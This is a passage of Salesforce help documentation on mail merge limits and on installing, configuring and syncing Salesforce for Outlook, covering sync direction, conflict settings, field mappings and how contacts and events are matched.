to select a smaller mail merge template. With Extended Mail Merge, Word does not open when you click Generate.
Instead, Salesforce sends you an email that either includes your generated Word document as an attachment or provides
a link to it on the Documents tab.

7. If you chose to log an activity for the mail merge, enter the task information, and optionally create a follow-up task.

The Subject of the mail merge task is set to the mail merge template name by default, and the task is displayed as a
completed activity in the Activity History related list. The merged document is not stored with the task.

You can log an activity for mail merge if you have access to view or edit the record you are merging and are able to create
tasks (that is, you have the “Edit Task” permission).

8. You can then print and mail your document or send it as an email attachment.

Mail Merge Considerations
• Standard mail merge requires:

◊ Microsoft® Internet Explorer® versions 7, 8, 9, and 10 (We don’t support Google Chrome Frame™ plug-in for Internet
Explorer because the ActiveX controls required for mail merge are supported in Internet Explorer only.)

◊ Microsoft Word 2003 or 2007
◊ Microsoft Windows® XP and Windows Vista® (32-bit only)

Extended Mail Merge supports the following additional environments: the Mozilla Firefox Web browser and the Apple
Mac OS. Furthermore, it does not require the installation of an ActiveX control.

Standard mail merge and Extended Mail Merge support versions of Microsoft Word 2000 and above.

• Standard mail merge currently supports Word 2007 templates saved in .docx or .dotx file formats, but Extended Mail
Merge does not.

• Mail merge documents give you access only to the fields that are accessible to you via your page layout and field-level
security settings.

• Standard and extended mail merge don't support formatting from rich text area fields.
• Using mail merge from a record detail page automatically triggers standard workflow and validation rules for that record.

Using the mass mail merge wizard, however, doesn't trigger those rules.
• With Extended Mail Merge, a mail merge operation cannot exceed the following limits:

◊ 1,000 records
◊ The selected mail merge template(s) total size cannot be larger than 1 MB.
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◊ For mass mail merges, the number of selected records multiplied by the combined sizes of the selected mail merge
templates cannot be larger than 50 MB.

See Also:
Can I do a mail merge with my data?
Mail Merge Overview
Generating Mass Mail Merge Documents with Extended Mail Merge

Can I do a mail merge with my data?
Yes. To create a single mail merge document using your data, click Mail Merge in the Activity History related list of a record.
To do bulk mail merges using your data, see the Salesforce Bulk Mail Merge Process document for instructions.

See Also:
Sending Single Mail Merge Documents

SYNCING SALESFORCE AND MICROSOFT® OUTLOOK® 2007
AND LATER

Syncing Microsoft Outlook with Salesforce Using
Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Watch a Demo: Using Salesforce for Outlook (2:43 minutes)

Salesforce for Outlook, a Microsoft® Outlook® integration application that you install, syncs contacts, events, and tasks between
Outlook and Salesforce. In addition to syncing these items, you can add Outlook emails to multiple Salesforce contacts, and
view Salesforce records related to the contacts and leads in your emails—all directly in Outlook!

Depending on your organization, you may be able to customize what you sync and the sync directions between Outlook and
Salesforce. Your administrator determines the level at which you can customize these settings in Salesforce.

Here’s a quick look at how Salesforce for Outlook helps you avoid duplicating your work and boost your productivity.
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See Also:
Getting Microsoft® Outlook® and Salesforce in Sync
Salesforce for Outlook System Requirements
Downloading the Salesforce for Outlook Installer
Installing and Setting Up Salesforce for Outlook

Why You Should Upgrade to Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

We’re focusing development on our latest Microsoft® Outlook® integration application, Salesforce for Outlook, and we don’t
want you to miss out on its latest features and improvements. Let’s compare it with Connect for Outlook.

Connect for OutlookSalesforce for OutlookI want to know

Requires you to select the contacts,
events, and tasks you want to sync.

Lets you choose sync methods—either manual or
automatic.

If you choose manual, you select the contacts, events, and
tasks to sync.

What syncs
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Connect for OutlookSalesforce for OutlookI want to know

If you choose automatic, Salesforce for Outlook syncs it
all, except the items you:
• Mark as Private in Outlook, and exclude them from

syncing in Salesforce for Outlook Settings
• Assign to the Outlook category Don’t Sync with

Salesforce

Requires you to manually sync. You
may be configured to automatically
sync.

Automatically syncs your data. You can also manually
sync at any time.

How it syncs

Doesn’t have anything similar.Includes the Salesforce Side Panel. When you select an
email in Outlook, the side panel:

Whether I can work with
Salesforce records directly in
Outlook • Displays up to four related Salesforce contacts and

leads, including up to four activities, cases, and
opportunities related to them.

• Lets you search for additional Salesforce records.

• Includes links to records, so you can view them directly
in Salesforce.

See it in action: Using the Salesforce Side Panel to
Work with Records in Microsoft® Outlook® (2:18
minutes)

Requires you to specify related
Outlook records for each contact,
event, and task you’re syncing.

Associates contacts to related Salesforce accounts
automatically. Contacts that Salesforce for Outlook can’t
associate go to My Unresolved Items in Salesforce, where
you can easily select related accounts.

For single and recurring events, as well as tasks, you’ll go
to My Unresolved Items, and select the related records.

How Outlook contacts,
events, and tasks are
associated with Salesforce

Lets you specify related Outlook
records for each email you’re
sending.

Lets you add emails to multiple Salesforce contacts, and
to one other record with which you can associate tasks,
such an account, a lead, or a case. You’ll use the Salesforce
Side Panel to do this.

How Outlook emails are
associated with Salesforce

Settings are managed by you in
Outlook.

Settings are managed by your administrator in Salesforce.
Your administrator can grant you permissions for
customizing your settings.

Where administration settings
are managed

Are You Interested Yet?

We hope so! You can learn more about Salesforce for Outlook using the following resources.

• In the online help, search for Salesforce for Outlook Overview.
• From the YouTube™ video community, search for Salesforce for Outlook.
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• In Salesforce Help, search for Getting Outlook and Salesforce in Sync, a  guide that helps you learn about how you can get
Outlook and Salesforce synced with Salesforce for Outlook.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Getting Microsoft® Outlook® and Salesforce in Sync

Salesforce for Outlook Supported Languages

Available in: Group, Professional, Enterprise, Unlimited, Developer, and Contact Manager Editions; and Trial
organizations

Salesforce for Outlook supports these languages.

• Chinese (Simplified)

• Chinese (Traditional)

• Czech

• Danish

• Dutch

• English

• German

• Finnish

• French

• Hebrew

• Hungarian

• Italian

• Japanese

• Korean

• Polish

• Portuguese (Brazil)

• Romanian

• Russian

• Spanish

• Spanish (Mexico)

• Swedish

• Thai

• Turkish

• Ukrainian

• Vietnamese

The Salesforce for Outlook installer doesn't support:
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• Hebrew

• Portuguese (Brazil)

• Romanian

• Spanish (Mexico)

• Thai

• Vietnamese

Downloading the Salesforce for Outlook Installer
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configuration AND

Valid data set for each object being synced

To install Salesforce for Outlook:

Your Outlook profile set as the default in your Mail SettingsTo change sync folders:

You’ll download the installer from Salesforce.

1. Close Microsoft® Outlook®.
2. If you’re upgrading Salesforce for Outlook and it’s open, make sure you close it now. To do so, right-click the

Salesforce for Outlook icon ( ) in your system tray, then click Exit.
3. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup

or My Settings—whichever one appears.
4. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Salesforce for Outlook.
• If you clicked My Settings, click Desktop Add-Ons > Salesforce for Outlook.

5. Click Download. Then click Save File. If the Download button is unavailable, ask your administrator to create and assign
you to an Outlook configuration.
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If you’re an administrator, you can deploy installations to multiple users simultaneously using the .msi version of the
installer.

See Also:
Getting Microsoft® Outlook® and Salesforce in Sync
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Salesforce for Outlook System Requirements
Installing and Setting Up Salesforce for Outlook

Installing and Setting Up Salesforce for Outlook
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configuration AND

Valid data set for each object being synced

To install Salesforce for Outlook:

Your Outlook profile set as the default in your Mail SettingsTo change sync folders:

1. Open the installation file you downloaded and saved, and complete the installation wizard.

Note:  If you don’t yet have .NET 4 installed, the installation wizard installs it for you. Keep in mind that the
installation wizard prompts you to restart your machine after it installs .NET 4. You then need to run the installation
wizard again to complete the installation process.

2. Open Microsoft® Outlook®. The setup wizard opens, and the Salesforce for Outlook icon ( ) appears in your system tray.

If the wizard doesn’t open, you can start it manually. Just right-click  and click Settings.

3. If you need to log in to a Salesforce site other than the default, click Change URL and pick the server to which you want
to connect. If the server you want isn’t listed, select Other... and enter the URL, such as a custom domain used by your
organization.

4. Enter your Salesforce username and password.
5. Click Approve. This creates a secure connection between Outlook and Salesforce. You won’t need to log in again unless

you encounter an error.

Note:  If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated.
Salesforce automatically sends you an activation email that you can use to log in. This lets you connect without
IP restrictions from anywhere.

6. Click Next, and choose the folders you want to sync. If you need to select different folders, click Change Folder and select
ones that are within your default folders or the main Mailbox folder.
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7. Click Next, and then choose your sync method. If you want to:

• Select the individual contacts, events, and tasks to sync, select Manual.
• Have Salesforce for Outlook sync all of your contacts, events, and tasks, select Automatic.

8. Click Next, and then select the kinds of private items you want to sync.
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9. Click Save. A welcome message appears at the system tray icon ( ), which is now active. If you’re configured to sync
Outlook items, and you chose Automatic for your sync method, all items in the folders you chose sync automatically. The
icon spins during every sync cycle.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Salesforce for Outlook System Requirements
Downloading the Salesforce for Outlook Installer
Uninstalling Salesforce for Outlook

Uninstalling Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

1. Close Outlook.

2. Right-click the sync icon ( ) and select Exit.
3. Using your Windows Add or Remove Programs tool, remove Salesforce for Outlook.

If you plan to reinstall Salesforce for Outlook, you'll have to first remove the old Salesforce for Outlook database files. Otherwise,
Salesforce for Outlook will use your old sync settings. Default database file locations:

• (Microsoft Windows 7 and Vista) C:\Users\username\AppData\Roaming\salesforce.com\Salesforce for
Outlook\DB\

• (Microsoft Windows XP) C:\Documents and Settings\username\Application
Data\salesforce.com\Salesforce for Outlook\DB\
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Managing Your Salesforce for Outlook Configuration
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

Your version of Salesforce for Outlook has been configured with certain functions, like syncing contacts, events, and tasks, or
adding emails to Salesforce. These settings are saved in a Salesforce for Outlook configuration in Salesforce.

1. Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

2. Depending on your permissions, you may be able to:

• Edit your email settings
• Edit your sync settings
• Edit your sync direction
• Edit your conflict settings
• View your matching criteria
• Edit your field mappings

3. Click Save. All changes take effect the next time your data syncs. Return to your original settings any time by clicking
Revert to default at the top of your modified configuration. Your administrator may change your settings as needed.

Editing Your Salesforce for Outlook Email Settings

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration:

“Add Email”To edit email settings:

The Email Settings section of your Salesforce for Outlook configuration shows you whether you’re allowed to add emails to
Salesforce from Outlook. Emails that you add using Salesforce for Outlook are saved in Salesforce and assigned to other
records based on your My Email to Salesforce settings.

1. Access your configuration in any of these ways.
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Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.•

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

If Add Email is selected, you’ll see Add Email and Send and Add buttons in Outlook.

Note:  If you don’t see the Add Email and Send and Add buttons, it’s possible your administrator hasn’t activated
Email to Salesforce. It’s also possible that your administrator set up your Outlook configuration so that you can
use the Salesforce Side Panel, which includes add email controls in the side panel itself. This feature, however,
doesn’t include send and add functionality.

2. Click Email to Salesforce Settings.
3. Enter email addresses you’ll use to send email in My Acceptable Email Addresses. Separate multiple email addresses

with commas.
4. Choose whether you’d like either all emails to be sent to My Unresolved Items so you can manually assign them to related

records, or to have Salesforce first try to automatically assign them.
5. Configure Email to Salesforce to add emails as activities to matching opportunities, leads, contacts, or all three. If you

configure Email to Salesforce to associate emails to matching leads or contacts, Salesforce searches the To and CC fields
for the email addresses of your leads or contacts. If any leads or contacts are found, Salesforce saves the email to the Activity
History related list on the appropriate record.

6. If you selected leads or contacts, choose how Email to Salesforce should process emails containing lead or contact information
that matches duplicate records. Email to Salesforce can add the email activity to either all matching records, the oldest
duplicate record, or the record that has greatest number of activities.

7. If you selected leads or contacts, you can select If no matching records are found, create a task and
send it to My Unresolved Items to have the email sent to My Unresolved Items if no matching records are found.
If this checkbox isn’t selected and Salesforce can’t identify the email addresses in the To or From fields, the email won't
be saved in Salesforce.

8. Select Always save email attachments to save attachments on emails sent to Salesforce. The size limit for an
attached file is 5 MB when attached directly to the related list. The size limit for all files attached to an email is 10 MB.

9. Select Email me confirmation of association to receive a confirmation email when an email is sent to Salesforce.
10. Click Save.

See Also:
Managing Your Salesforce for Outlook Configuration
Adding Email with Salesforce for Outlook
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
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Editing Your Salesforce for Outlook Sync Settings

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

“Whether object is synced”To disable sync:

The Sync Settings section of your Salesforce for Outlook configuration tells you which objects you're allowed to sync and the
direction data syncs. To view or edit these settings:

1. Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

2. Hover over filter icons ( ) to see which kinds of records sync.
3. Deselect a checkbox to stop an item from syncing. All fields related to that item are disabled on the page.
4. Click Save. All changes take effect the next time your data syncs. Return to your original settings any time by clicking

Revert to default at the top of your modified configuration. Your administrator may change your settings as needed.

See Also:
Managing Your Salesforce for Outlook Configuration
Syncing with Salesforce for Outlook

Editing Your Salesforce for Outlook Sync Direction

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

“Sync direction”To change sync direction

Sync direction indicates the direction data flows when Salesforce for Outlook syncs data.

1. Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.
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2. Select one of these options under Sync Direction for a particular object.

• Outlook to salesforce.com—During its first sync, a record in Outlook creates or updates a record in Salesforce.
During future syncs, changes made to Outlook records appear in Salesforce, regardless of whether the Salesforce version
has changed. In addition, deleting a synced record in Outlook deletes its Salesforce counterpart. Salesforce changes are
never sent to Outlook. The required conflict behavior setting for this option is Outlook always wins. This option
isn't available for contacts.

• Salesforce.com to Outlook—When data first syncs, a record in Salesforce creates or updates a record in
Outlook. During future syncs, changes made to Salesforce records appear in Outlook, regardless of whether the Outlook
version of the record has changed. In addition, deleting a synced record in Salesforce deletes its Outlook counterpart.
Outlook changes are never sent to Salesforce. The required conflict behavior setting for this option is Salesforce.com
always wins.

• Sync both ways—When records sync, changes to Outlook records are reflected in Salesforce, and vice versa. If
records conflict, the conflict behavior setting determines which record wins.

3. Click Save. All changes take effect the next time your data syncs. Return to your original settings any time by clicking
Revert to default at the top of your modified configuration. Your administrator may change your settings as needed.

See Also:
Managing Your Salesforce for Outlook Configuration

Editing Your Salesforce for Outlook Conflict Settings

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

“Conflict behavior”To change conflict behavior

Conflict behavior settings determine what happens when Salesforce for Outlook encounters a conflict when syncing data both
ways. A conflict occurs when the same record is updated in both Salesforce and Outlook or when a record is updated on one
side and deleted in the other.

1. Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

2. Under Conflict Behavior for each object you're syncing, select one of these options.

• Salesforce.com always wins

• Outlook always wins
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3. Click Save. All changes take effect the next time your data syncs. Return to your original settings any time by clicking
Revert to default at the top of your modified configuration. Your administrator may change your settings as needed.

Viewing Your Salesforce for Outlook Matching Criteria

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

Assigned to a configurationTo view your configuration

If Salesforce for Outlook finds multiple matching contacts when a contact first syncs from Outlook, we pick a Salesforce
contact based on the matching criteria defined by your administrator.

Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

Then review the matching preference assigned to you. Options are:

• Most recent activity—Choose the Salesforce contact that shows the most recent activity (such as a phone call or
email), as shown in the contact's Activity History related list. This is the default matching option.

• Last updated—Choose the Salesforce contact that was most recently modified.

• Oldest—Choose the Salesforce contact that has the earliest creation date.

See Also:
Managing Your Salesforce for Outlook Configuration
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Editing Your Salesforce for Outlook Field Mappings

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo access your configuration

“Field mappings”To change field mappings

Field mappings define which Salesforce and Outlook fields correspond when records sync with Salesforce for Outlook.
Depending on your permissions, you may be able to edit your field mappings.

1. Access your configuration in any of these ways.

• Go to the Salesforce for Outlook page in your personal settings in Salesforce. Then click View My Configuration.

• Right-click the system tray icon ( ) on your desktop, and select Salesforce > Outlook Configuration.

2. Click Edit Field Mappings.
3. Choose a field from the Salesforce Field picklist. This list displays the names of all Salesforce fields that haven't yet

been mapped.

Warning:  If you map a custom field that is universally required, make sure it has a default value to avoid errors.
Also, note that mapping custom fields that require validation by Salesforce may cause sync errors. For example,
if you map a custom Salesforce field that requires a unique value, you'll get a uniqueness error when you sync if
you enter a non-unique value in the Outlook field.

4. Choose a field from the Outlook Field picklist next to the selected Salesforce.com field. This list displays the names
of all standard Outlook fields that haven't yet been mapped and that match the data type of the corresponding Salesforce
field.

5. To map a Salesforce field to a custom Outlook field, select Custom Field... from the end of the corresponding
Outlook Field picklist. Enter the field's name and click OK.

The custom field must already exist in Outlook. Letters are not case-sensitive, and these characters aren't allowed: [, ], _,
#. The first sync validates that the custom Outlook field exists and then maps it to the Salesforce field. Custom Outlook
fields use a string data type. Note that we only allow custom fields for Salesforce text fields and non-restricted picklists.

6. Click Save. All changes take effect the next time your data syncs. Return to your original settings any time by clicking
Revert to default at the top of your modified configuration. Your administrator may change your settings as needed.

To remove a field mapping, click the delete icon to the right of the mapping. To redo the mapping, just add a new mapping
to the bottom of the list. You can map custom Salesforce fields to standard or custom Outlook fields. You can't map picklist
values.

See Also:
Managing Your Salesforce for Outlook Configuration
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Using the Salesforce for Outlook System Tray Application
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

After you install Salesforce for Outlook, a new application icon ( ) appears in your Microsoft® Windows system tray. You
can use this application to:

• Sync Outlook and Salesforce items

• View your sync log

• Resolve your unresolved synced items

• Manage your Salesforce for Outlook configuration

• Change your login information

• Hide alerts

• View errors

• Change your sync folders

• Access the Salesforce for Outlook online help

Accessing the System Tray Application

• If you don't see the icon, just restart the application by double-clicking the Salesforce for Outlook shortcut on your
desktop or the application in your computer's Programs directory (Start > All Programs > salesforce.com >
Salesforce for Outlook).

• If the icon is disabled ( ), you may need to start Outlook.
• If you're using Microsoft Windows 7, you may need to click the arrow next to the notification area and drag the

Salesforce for Outlook icon to the system tray.

Viewing the Salesforce for Outlook Sync Log

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

The sync log records troubleshooting information for Salesforce for Outlook, including the number of records that had errors
and the number of records that were created, updated, or deleted during sync.

To view this log, right-click the system tray icon ( ) and click Sync > View Sync Log.

See Also:
Using the Salesforce for Outlook System Tray Application
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Changing Your Salesforce for Outlook Login Information

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configurationTo log in to Salesforce for Outlook

If your Salesforce username or password changes, you'll need to update your login information in Salesforce for Outlook.

1. Right-click the system tray icon ( ) on your desktop and select Settings...
2. Click Change User.
3. Enter your correct Salesforce username and password, and click Login. This creates a secure connection between Outlook

and Salesforce. You won’t need to log in again unless you encounter an error.
4. Click Next, and then click Done.

Note: If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated.
Salesforce automatically sends you an activation email that you can use to log in. The email contains a security token
that you must add to the end of your password. For example, if your password is mypassword, and your security
token is XXXXXXXXXX, you must enter mypasswordXXXXXXXXXX to log in.

See Also:
Using the Salesforce for Outlook System Tray Application

Changing Your Salesforce for Outlook Sync Folders

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Assigned to an active configuration

AND

Your Outlook profile set as the default in your Mail Settings

To change sync folders:

“Whether object is synced”To disable sync:

Salesforce for Outlook uses Microsoft® Outlook® folders to limit which records sync with Salesforce. Before you complete the
Salesforce for Outlook setup wizard, make sure the folders you want to sync contain the right records. If you’re syncing from
Outlook to Salesforce, moving a record out of a synced Outlook folder deletes that record in Salesforce. If you’re syncing from
Salesforce to Outlook, removing a record from Salesforce deletes that record in Outlook.
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To change your sync folders after your initial setup:

1. Right-click the system tray icon ( ) on your desktop and select Settings....
2. Click Change Folder and select or create a folder that's within your default folders or the main Mailbox folder.
3. Click Save.

Salesforce for Outlook starts syncing with the new folders immediately.

See Also:
Using the Salesforce for Outlook System Tray Application

Hiding Salesforce for Outlook Alerts

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Salesforce for Outlook automatically displays system tray alerts about issues like sync errors and unresolved synced records.

To hide these alerts, right-click the system tray icon ( ) and click Hide Alerts. Click Hide Alerts again to show them.

See Also:
Using the Salesforce for Outlook System Tray Application

Viewing Salesforce for Outlook Errors

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Whenever Salesforce for Outlook has problems syncing your data, the system tray icon changes to an error icon ( ), and the
status text at the top of the system tray shortcut menu displays the number of errors.

To view these errors, double-click the system tray icon or click the text in the shortcut menu to open the Salesforce for Outlook
Error dialog box. If an error relates to a specific Outlook record, you can click the record's link to edit that record in Outlook.

To refresh the list after you resolve errors, click Try Again. Salesforce for Outlook syncs your data and removes any errors
that have been resolved.

See Also:
Using the Salesforce for Outlook System Tray Application
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Syncing with Salesforce for Outlook
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Sync enabled for contacts or eventsTo sync data

Salesforce for Outlook syncs data automatically without interrupting your work. To achieve this, Salesforce for Outlook uses
Microsoft® Outlook® folders to limit which records sync with Salesforce. Before you complete the Salesforce for Outlook
setup wizard, make sure the folders you want to sync contain the right records. If you’re syncing from Outlook to Salesforce,
moving a record out of a synced Outlook folder deletes that record in Salesforce. If you’re syncing from Salesforce to Outlook,
removing a record from Salesforce deletes that record in Outlook.

It’s good to learn about your options for excluding certain records from syncing, as well as syncing your data automatically and
manually.

Excluding Certain Records from Syncing

If you chose the Automatic option for your sync method, you have a couple of options for excluding certain items from syncing
with Salesforce for Outlook.

• You can choose to sync items you mark as Private in Microsoft® Outlook®. If you don’t want to sync private items, open
Salesforce for Outlook Settings, and deselect the types of private items you don’t want to sync.

• If you don’t want certain Outlook items to sync, regardless of whether they’re marked as Private, assign them to the category
Don’t Sync with Salesforce in Outlook. For details on using categories in Outlook, refer to your Outlook documentation.

Understanding How Salesforce for Outlook Syncs Data

• Your data syncs automatically after you set up Salesforce for Outlook.
• Events and tasks sync automatically every ten minutes; contacts sync automatically every hour. If, however,

Salesforce for Outlook detects keyboard or mouse inactivity for 30 minutes, the sync frequency for events and tasks changes
to 30 minutes. After two hours of inactivity, the frequency for all updates changes to hourly, and after four hours, the
frequency changes to every four hours.

• You can force a sync at any time by right-clicking the system tray icon ( ) and clicking Sync > Sync Now.
• Your Outlook configuration defines which items are set to sync, which direction the data flows between Outlook and

Salesforce, and what happens when data conflicts.
• Outlook and Salesforce must be configured to sync before you can see the Sync > Sync Now menu item.
• If data is undeleted in Salesforce or becomes available because of a change in sharing permissions, it will show up in Outlook

within 24 hours or when you manually sync from the system tray.

See Also:
Syncing Contacts with Salesforce for Outlook
Syncing Events with Salesforce for Outlook
Syncing Tasks with Salesforce for Outlook
My Unresolved Items Overview
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Syncing Contacts with Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on contacts

AND

Contact sync direction set to Salesforce.com to
Outlook

To sync contacts from Salesforce to Outlook:

“Read” and “Edit” on contacts, and “Read” on accounts

AND

Contact sync direction set to Sync both ways

To sync contacts both ways:

You can keep your important Outlook and Salesforce contacts in sync using Salesforce for Outlook. When contacts initially
sync, Salesforce for Outlook checks to see whether a contact with the same email address exists in both Outlook and Salesforce.
If a matching email address exists, the two contacts are synced. If it doesn’t exist, Salesforce for Outlook checks to see whether
a contact with the same first name, last name, and company name exists. If it doesn’t exist, a new contact is created and the
two are synced.

Your Outlook configuration defines which items are set to sync, which direction the data flows between Outlook and Salesforce,
and what happens when data conflicts. You can set up Salesforce for Outlook to sync in the following ways, depending on
whether your administrator allows you to change sync directions.

• Salesforce.com to Outlook

• Sync both ways

Salesforce for Outlook lets you sync up to 5,000 contacts, and isn’t case-sensitive when matching contacts.

This diagram shows how contacts sync.
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How contacts sync when the sync direction is Salesforce.com to Outlook:

ThenIf

The Salesforce contact replaces the Outlook contact and the
two are synced.

A contact already exists in Outlook

Salesforce for Outlook syncs the Salesforce contact, which
creates the contact in Outlook.

A contact doesn’t yet exist in Outlook

Salesforce for Outlook will not sync the Salesforce contact
again.

A contact was deleted in Outlook

We select one of them.Multiple matching contacts exist in Outlook
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ThenIf

The Salesforce contact always overwrites the Outlook contact,
regardless of which one was updated.

A contact is updated

The Outlook counterpart is also deleted. If the Outlook
contact is deleted and the Salesforce contact is updated, the
contact is recreated in Outlook.

A Salesforce contact is deleted

How contacts sync when the sync direction is Sync both ways:

ThenIf

The contact is automatically created on the other side and the
two are synced.

A contact exists on one side only

One contact record replaces the other one, and the records
are synced. If your Outlook configuration specifies that

A matching contact exists

Outlook contacts win, the Outlook version replaces the
Salesforce version, and vice versa if Salesforce is set to win.
Any change to either record is automatically reflected in the
other. If records conflict, the conflict behavior setting
determines which record wins.

As long as there’s only one version of the Outlook contact and
that contact has an email address, we sync the Outlook contact

Multiple matching Salesforce contacts exist

with aSalesforce contact based on your matching preference,
such as the contact that was most recently updated.

Both contacts are updated with the latest changes. If records
conflict, the conflict behavior setting determines which record
wins.

A contact is updated

The Outlook counterpart is deleted if Salesforce is set to win,
and the contact is recreated in Salesforce if Outlook is set to
win.

A Salesforce contact is deleted and the Outlook contact is
updated

The Salesforce counterpart is deleted if Outlook is set to win,
and the contact is recreated in Outlook if Salesforce is set to
win.

An Outlook contact is deleted and the Salesforce contact is
updated

Note: If person accounts have been implemented in your organization, Salesforce for Outlook can sync person
accounts between your Accounts tab in Salesforce and your contacts folder in Outlook. You can create new person
accounts in Salesforce and view, edit, and delete synced person accounts in Outlook or Salesforce. Contacts synced
from Outlook to Salesforce may be matched to person accounts.

A deleted person account will be recreated as a contact in Salesforce if:

• You update the related Outlook contact before the next sync, and

• Your configuration is set to sync both ways with Outlook winning.
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Excluding Certain Records from Syncing

If you chose the Automatic option for your sync method, you have a couple of options for excluding certain items from syncing
with Salesforce for Outlook.

• You can choose to sync items you mark as Private in Microsoft® Outlook®. If you don’t want to sync private items, open
Salesforce for Outlook Settings, and deselect the types of private items you don’t want to sync.

• If you don’t want certain Outlook items to sync, regardless of whether they’re marked as Private, assign them to the category
Don’t Sync with Salesforce in Outlook. For details on using categories in Outlook, refer to your Outlook documentation.

See Also:
Syncing with Salesforce for Outlook
Resolving Your Synced Outlook Contacts

Syncing Events with Salesforce for Outlook

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” and “Edit” on events, and event sync direction set to
Outlook to salesforce.com

To sync events from Outlook to Salesforce

“Read” and “Edit” on events, and event sync direction set to
Salesforce.com to Outlook

To sync events from Salesforce to Outlook:

“Read” and Edit” on events, and event sync direction set to
Sync both ways

To sync events both ways:

“Enable Multiday Events” on activitiesTo sync multiday events:

You can keep your Outlook and Salesforce events in sync using Salesforce for Outlook. After an event is in Salesforce, you
can assign it to related records, like contacts, accounts, opportunities, and so on. Syncing events also lets you maintain an
accurate view of your availability when you create events and request meetings from your Salesforce calendar.

Which Events Sync

Your Outlook configuration defines which items are set to sync, which direction the data flows between Outlook and
Salesforce, and what happens when data conflicts. The event filters in your configuration determine which events sync.
The possible filters are:
• TODAY—Syncs events that end on or after today. The start time is 12:00 a.m.

• LAST MONTH—Syncs events that ended on or after the first day of last month.

• LAST N DAYS—Syncs events that ended on or after a specified number of days ago, such as LAST 30 DAYS.

Event updates stop syncing once the event falls outside of the range you're configured to sync.

The following items don’t sync: all-day events beginning on the first day you’re configured to sync, and event attendees.
Multiday events sync as single events in either direction. Recurring event patterns must match exactly.
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Salesforce for Outlook syncs events based on their end dates rather than their start dates. For example, if you’re syncing
current and future events only, a two-day event that started yesterday still syncs.

How We Match Events

When events first sync, we either link them with existing events that have the same subject and time or create new events
if nothing matches.

How You Assign Events to Salesforce records

After an event is added to Salesforce, you can assign it to other records using the My Unresolved Items page or the
Related To and Name fields on the event record. The event is added to the associated record’s Activity History or
Open Activities related list. You can’t save changes if your events have a required custom field or an activity custom field
becomes required after items are added to your unresolved events list.

Who Sees Synced Events in Salesforce

Events that aren't marked as private are visible Salesforce to you, those above you in your role hierarchy, and anyone
who has access to the records they're associated with. You can also grant access to view your calendar to other users,
personal and public groups, roles, or roles and subordinates.

Excluding Certain Records from Syncing

If you chose the Automatic option for your sync method, you have a couple of options for excluding certain items from syncing
with Salesforce for Outlook.

• You can choose to sync items you mark as Private in Microsoft® Outlook®. If you don’t want to sync private items, open
Salesforce for Outlook Settings, and deselect the types of private items you don’t want to sync.

• If you don’t want certain Outlook items to sync, regardless of whether they’re marked as Private, assign them to the category
Don’t Sync with Salesforce in Outlook. For details on using categories in Outlook, refer to your Outlook documentation.

See Also:
Syncing with Salesforce for Outlook
Resolving Your Synced Outlook Events
Syncing Recurring Events with Salesforce for Outlook Overview
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Syncing Recurring Events with Salesforce for Outlook Overview

